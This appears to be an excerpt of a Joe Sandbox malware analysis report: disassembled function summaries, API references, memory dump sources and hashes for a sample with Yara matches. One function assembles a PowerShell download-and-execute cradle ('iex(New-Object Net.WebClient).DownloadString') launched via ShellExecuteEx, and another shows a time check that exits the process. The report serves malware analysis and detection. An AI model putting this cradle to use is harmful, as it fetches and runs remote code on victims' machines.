                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 03012D85
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 03012D04
                                                                                                                                                                • <, xrefs: 03012D39
                                                                                                                                                                • ')", xrefs: 03012CB3
                                                                                                                                                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 03012CC4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                                                                                                                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                • API String ID: 3031569214-898575020
                                                                                                                                                                • Opcode ID: 24283ec34f6b64d61b0e60a6a54b9c9c57b772079d116c18c6a3e572ee1c2a80
                                                                                                                                                                • Instruction ID: 83f52a07cd52f2d0e3322be6de6d6db169f3415b7ead9741d191dab9d0efc707
                                                                                                                                                                • Opcode Fuzzy Hash: 24283ec34f6b64d61b0e60a6a54b9c9c57b772079d116c18c6a3e572ee1c2a80
                                                                                                                                                                • Instruction Fuzzy Hash: AB41DA75E123089BDB14EBA0D990FEDBB78AF54310F404119E016AF190EFB46A9ACF90
                                                                                                                                                                APIs
                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 6CCD7526
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CCD7566
                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 6CCD7597
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                • API String ID: 3217676052-1401603581
                                                                                                                                                                • Opcode ID: ac09a495280adfafc159eccc07d1ebad99d0f49505d5df31f8354f94639561c4
                                                                                                                                                                • Instruction ID: 45b533110728ba825255fa522591f5591d60512a25960203de70224e6ceb8493
                                                                                                                                                                • Opcode Fuzzy Hash: ac09a495280adfafc159eccc07d1ebad99d0f49505d5df31f8354f94639561c4
                                                                                                                                                                • Instruction Fuzzy Hash: 62212831700501AFDA158FE9E858E4973B5EF86325F15452AD62587F40FB31B803CF96
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryW.KERNEL32(ntdll.dll,?,6CCDC0E9), ref: 6CCDC418
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CCDC437
                                                                                                                                                                • FreeLibrary.KERNEL32(?,6CCDC0E9), ref: 6CCDC44C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                • API String ID: 145871493-2623246514
                                                                                                                                                                • Opcode ID: c21ad1ec8297dc5566bcfbd3eef94e14ba809ed1bea19995e848d0de679fbb99
                                                                                                                                                                • Instruction ID: 11a58accfa0c9ec67dc8e01dc8862bd24b539a4cd99d0e0081d5d2150fa22bcb
                                                                                                                                                                • Opcode Fuzzy Hash: c21ad1ec8297dc5566bcfbd3eef94e14ba809ed1bea19995e848d0de679fbb99
                                                                                                                                                                • Instruction Fuzzy Hash: 6AE092716113099FDF006F71EA187117BF8EF0B205F045116AA24D2B40EBB4D401CA50
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryW.KERNEL32(ntdll.dll,?,6CCD748B,?), ref: 6CCD75B8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CCD75D7
                                                                                                                                                                • FreeLibrary.KERNEL32(?,6CCD748B,?), ref: 6CCD75EC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                • API String ID: 145871493-3641475894
                                                                                                                                                                • Opcode ID: 59462c0702433c75101dc186aebf00527187fffc0049982b7afdaee3689afb3e
                                                                                                                                                                • Instruction ID: 4877530521246d7ea678788a6cfcfc93ec8f5037822c9ea06eb364b6361037ca
                                                                                                                                                                • Opcode Fuzzy Hash: 59462c0702433c75101dc186aebf00527187fffc0049982b7afdaee3689afb3e
                                                                                                                                                                • Instruction Fuzzy Hash: 6CE0B671650302AFEF006FA2E858701FEF8EF06318F209027AA25D1A40FBF59482CF15
                                                                                                                                                                APIs
                                                                                                                                                                • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC74E5A
                                                                                                                                                                • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC74E97
                                                                                                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC74EE9
                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC74F02
                                                                                                                                                                • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CC74F1E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 713647276-0
                                                                                                                                                                • Opcode ID: 6bb4a37371dc70f9232cc5008df87baaa11286488eca9508a61d8da8b028adee
                                                                                                                                                                • Instruction ID: 4abdc4cccd4d0e65c15a6a24289c8e898b71e332afb811c7b5277bd2536893ff
                                                                                                                                                                • Opcode Fuzzy Hash: 6bb4a37371dc70f9232cc5008df87baaa11286488eca9508a61d8da8b028adee
                                                                                                                                                                • Instruction Fuzzy Hash: 3A41BF716087059FC725CF29C88095BFBE8FF8A354F108A2DF46587641EB30E958CBA2
                                                                                                                                                                APIs
                                                                                                                                                                • strtok_s.MSVCRT ref: 03010DB8
                                                                                                                                                                • strtok_s.MSVCRT ref: 03010EFD
                                                                                                                                                                  • Part of subcall function 0301A820: lstrlen.KERNEL32(00000000,?,?,03015B54,03020ADB,03020ADA,?,?,03016B16,00000000,?,03540578,?,0302110C,?,00000000), ref: 0301A82B
                                                                                                                                                                  • Part of subcall function 0301A820: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A885
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 348468850-0
                                                                                                                                                                • Opcode ID: 8a2da65d64f8feeadeda32fa37012c9fd99ba9c3d0ffd82e124739938a7fe57d
                                                                                                                                                                • Instruction ID: a9269f4bc237ab1181052308d06afc57ca774e11ab92f5b0112e7032070df36d
                                                                                                                                                                • Opcode Fuzzy Hash: 8a2da65d64f8feeadeda32fa37012c9fd99ba9c3d0ffd82e124739938a7fe57d
                                                                                                                                                                • Instruction Fuzzy Hash: D1514CB5A4120AEFCB18DF94D595AAE7BF5FF48304F108059E802AB340D730EAA1CF91
                                                                                                                                                                APIs
                                                                                                                                                                • moz_xmalloc.MOZGLUE(-00000002,?,6CC8152B,?,?,?,?,6CC81248,?), ref: 6CC8159C
                                                                                                                                                                • memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC8152B,?,?,?,?,6CC81248,?), ref: 6CC815BC
                                                                                                                                                                • moz_xmalloc.MOZGLUE(-00000001,?,6CC8152B,?,?,?,?,6CC81248,?), ref: 6CC815E7
                                                                                                                                                                • free.MOZGLUE(?,?,?,?,?,?,6CC8152B,?,?,?,?,6CC81248,?), ref: 6CC81606
                                                                                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CC8152B,?,?,?,?,6CC81248,?), ref: 6CC81637
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 733145618-0
                                                                                                                                                                • Opcode ID: 581513f89016ff1a0382425b61696caf64d0d2be1c24ab809f9afda81563cfda
                                                                                                                                                                • Instruction ID: 07d0fa4fdccddcb6824cabcf86e24df19143ca42f1d445ce9bdc0b7512c6dc5b
                                                                                                                                                                • Opcode Fuzzy Hash: 581513f89016ff1a0382425b61696caf64d0d2be1c24ab809f9afda81563cfda
                                                                                                                                                                • Instruction Fuzzy Hash: 8031B372A015158BC7188E6CD8504AF7AE9FB853787240B2DE873DBBD4FB30D9048791
                                                                                                                                                                APIs
                                                                                                                                                                • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6CCEE330,?,6CC9C059), ref: 6CCDAD9D
                                                                                                                                                                  • Part of subcall function 6CC8CA10: malloc.MOZGLUE(?), ref: 6CC8CA26
                                                                                                                                                                • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6CCEE330,?,6CC9C059), ref: 6CCDADAC
                                                                                                                                                                • free.MOZGLUE(?,?,?,?,00000000,?,?,6CCEE330,?,6CC9C059), ref: 6CCDAE01
                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,6CCEE330,?,6CC9C059), ref: 6CCDAE1D
                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6CCEE330,?,6CC9C059), ref: 6CCDAE3D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3161513745-0
                                                                                                                                                                • Opcode ID: 48d9a8302b2966a23270f9ca6396571412348c62181381baa8cf42c55230f6ce
                                                                                                                                                                • Instruction ID: c0636de9b92afbf76c49d25fd7bcdf89aceb49ee25594da57ad854f43f46a7e5
                                                                                                                                                                • Opcode Fuzzy Hash: 48d9a8302b2966a23270f9ca6396571412348c62181381baa8cf42c55230f6ce
                                                                                                                                                                • Instruction Fuzzy Hash: F43144B1A002159FDB14DF769D44AABBBF8EF89614F15882DE95AD7700F734E804CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6CCEDCA0,?,?,?,6CCAE8B5,00000000), ref: 6CCD5F1F
                                                                                                                                                                • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CCAE8B5,00000000), ref: 6CCD5F4B
                                                                                                                                                                • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6CCAE8B5,00000000), ref: 6CCD5F7B
                                                                                                                                                                • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6CCAE8B5,00000000), ref: 6CCD5F9F
                                                                                                                                                                • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CCAE8B5,00000000), ref: 6CCD5FD6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1389714915-0
                                                                                                                                                                • Opcode ID: 16a143eadeb03d2f65ab1a90ca8c1cd7919da6a1becb725a27fd837cd9c2c627
                                                                                                                                                                • Instruction ID: aba51d20ee069f6511b9cdafc9e49e359624b0ba2cb2c5e12696df45b66a6e43
                                                                                                                                                                • Opcode Fuzzy Hash: 16a143eadeb03d2f65ab1a90ca8c1cd7919da6a1becb725a27fd837cd9c2c627
                                                                                                                                                                • Instruction Fuzzy Hash: 46314C743006008FD710CF29C898E2ABBF9FF89359B658558E6668BB95D731FC41CB91
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 6CC7B532
                                                                                                                                                                • moz_xmalloc.MOZGLUE(?), ref: 6CC7B55B
                                                                                                                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC7B56B
                                                                                                                                                                • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CC7B57E
                                                                                                                                                                • free.MOZGLUE(00000000), ref: 6CC7B58F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1858482528.000000006CC71000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC70000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1858461408.000000006CC70000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858572898.000000006CCFE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1858596249.000000006CD02000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_6cc70000_BitLockerToGo.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4244350000-0
                                                                                                                                                                • Opcode ID: 031775e56eb3fe94ff081c4f51cc849b9af51c2c0ce914038a1ebb857320c297
                                                                                                                                                                • Instruction ID: 91e54fafba17eeaf80f79e3995d44e71854b24a86c0ad41b2ad6e977283ad0fa
                                                                                                                                                                • Opcode Fuzzy Hash: 031775e56eb3fe94ff081c4f51cc849b9af51c2c0ce914038a1ebb857320c297
                                                                                                                                                                • Instruction Fuzzy Hash: D921E571A002059BDB108F69DC50BAEBBB9FF86318F284129E928DB341F776D915C7A1
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemTime.KERNEL32(0302110C,?,?,03016B11,00000000,?,03540578,?,0302110C,?,00000000,?), ref: 0301696C
                                                                                                                                                                • sscanf.NTDLL ref: 03016999
                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(0302110C,00000000,?,?,?,?,?,?,?,?,?,?,?,03540578,?,0302110C), ref: 030169B2
                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,03540578,?,0302110C), ref: 030169C0
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 030169DA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Time$System$File$ExitProcesssscanf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2533653975-0
                                                                                                                                                                • Opcode ID: 6fc5dcbf8a0c36c8749d8efc3bf769ac0f81b5127e24dd0b8a1a6a02926d6e02
                                                                                                                                                                • Instruction ID: 8562179e6ff7cb1af85578f8c614bfaf85b5ab97105ade3f4f63f48143c3db70
                                                                                                                                                                • Opcode Fuzzy Hash: 6fc5dcbf8a0c36c8749d8efc3bf769ac0f81b5127e24dd0b8a1a6a02926d6e02
                                                                                                                                                                • Instruction Fuzzy Hash: 0B21EA75D0420CABCB04EFE4E9499EEB7B9FF48300F04852AE406A7244EB355615CB64
                                                                                                                                                                APIs
                                                                                                                                                                • WideCharToMultiByte.KERNEL32 ref: 6CCD76F2
                                                                                                                                                                • moz_xmalloc.MOZGLUE(00000001), ref: 6CCD7705
                                                                                                                                                                  • Part of subcall function 6CC8CA10: malloc.MOZGLUE(?), ref: 6CC8CA26
                                                                                                                                                                • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CCD7717
